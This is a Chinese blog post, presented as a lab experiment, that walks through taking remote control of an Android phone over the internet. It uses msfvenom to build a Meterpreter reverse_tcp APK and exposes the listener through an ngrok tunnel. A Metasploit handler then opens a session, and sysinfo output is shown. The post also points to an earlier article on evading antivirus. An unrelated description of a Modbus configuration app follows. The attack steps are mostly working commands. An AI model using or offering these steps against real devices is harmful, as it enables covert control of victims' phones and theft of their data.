Metasploit实验:android内网的反弹控制

 

一。测试环境:

    实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX):

    安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX):

 

   思路:制作payload,攻击,映射端口

二、准备:一个ngrok帐号。

    2.1没有可以去注册:https://www.ngrok.cc/login/register,选择免费的隧道,协议选择TCP ,如下图结果:

    2.2注册好帐号,在下载对应的客户端,我选择的是64位的系统,下载运行。

 

cd /root/下载/linux_amd64/
./sunny clientid 0159XX8b07aXXXXX  //隧道id

运行NGROK后提示下列信息:

Sunny-Ngrok   官 网 www.ngrok.cc+C 退 出 )


                                          
Tunnel Status                
online 
 

免费的要多连几次,也可以购买1个月的玩一下,才10大洋!

三、生成payload

运行

     msfvenom -p android/meterpreter/reverse_tcp lhost=free.XXXXX.com lport=11009 R > /home/fandan.apk

红色部分换成你申请的服务器地址和服务器对应的端口,一定要记得!

结果显示如下:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10191 bytes

要是 免杀可以参考上一篇文章:https://blog.csdn.net/wjwqp/article/details/105420153

生成不了要确认服务端口和隧道ID是否正确

四、启动msfconsole,运行:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.XX
exploit

五、把fandan.apk上传到安卓Oppo手机。

 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.XX:11009
[*] Sending stage (73548 bytes) to 192.168.0.XX
[*] Meterpreter session 2 opened (192.168.0.XX:11009 -> 192.168.0.XX:41230) at 2020-04-11 20:39:23 +0800

meterpreter > sysinfo
Computer    : localhost
OS          : Android 9 - Linux 4.9.112-perf+ (aarch64)
Meterpreter : dalvik/android
meterpreter >ipconfig  //  查看oppo的ip地址


 

 

好了,现在可以在msf下对appo手机进行访问了。

本实验到此结算

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用户可以根据需求在驱动库里选择相对应的通讯驱动程序,配置相应的通讯握手参数,自由定义需要控制和采集的变量名、通讯地址、数据类型和初始值。功能说明及图片展示: 1.安装完成首次进入将会显示三页功能简要展示页面。 2.点击“立即使用”按钮,进入登录界面(公测账户为admin,密码admin)。 3.登录成功进入APP主页,此时主页所有状态为初始未配置状态。 4.在主页状态下向右滑动,可打开功能模块选择列表。 5.点击“WIFI连接”进入连接现场设备网络页面,如果此时用户已通过手机WIFI页面连接现场设备,则直接跳过此步骤。 6.连接成功后返回功能模块选择列表,点击“参数设置”进入通讯相关参数配置页面(首先进入驱动配置页面),目前驱动库中只有支持Modbus TCP的驱动,后续会持续更新,用户通过在驱动库列表中长按操作将选中的驱动挑选至已选列表中,如果要取消,可以在已选列表中通过同样的长按操作完成。 7.配置要访问的设备通讯参数,与主页的操作逻辑一致,在驱动配置页面向右滑动打开配置功能列表,点击“通讯参数配置”进入通讯参数配置页,然后点击右上角的加号,此时软件会根据已选的驱动类型自动添加一条相对应的通讯参数,用户可以通过双击的方式打开修改列表,然后在列表的某一条参数处通过长按的方式进入最终的修改对话框,修改完成后,可以通过长按的方式选定当前需要的参数配置信息到已选区域。 8.通讯参数配置完成后,向右滑动进入配置功能列表,点击“IO参数配置”进入地址段的分配,点击右上角的加号,在弹出的对话框中根据实际需求分配响应的起始地址以及地址数量,分配完成后,可在屏幕右侧边缘向左滑动调出隐藏功能菜单,通过功能菜单可查看和修改配置地址段的功能对应的IO点信息。 9.所有配置完成后,可返回主页,此时主页显示当前配置的信息,其中“控制操作”功能可以通过按钮发送布尔值,操作逻辑为当前值为0时发送1,当前值为1时发送0,而“参数设置”功能通过对子项长按可以设置调出输入框设置相应的参数值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值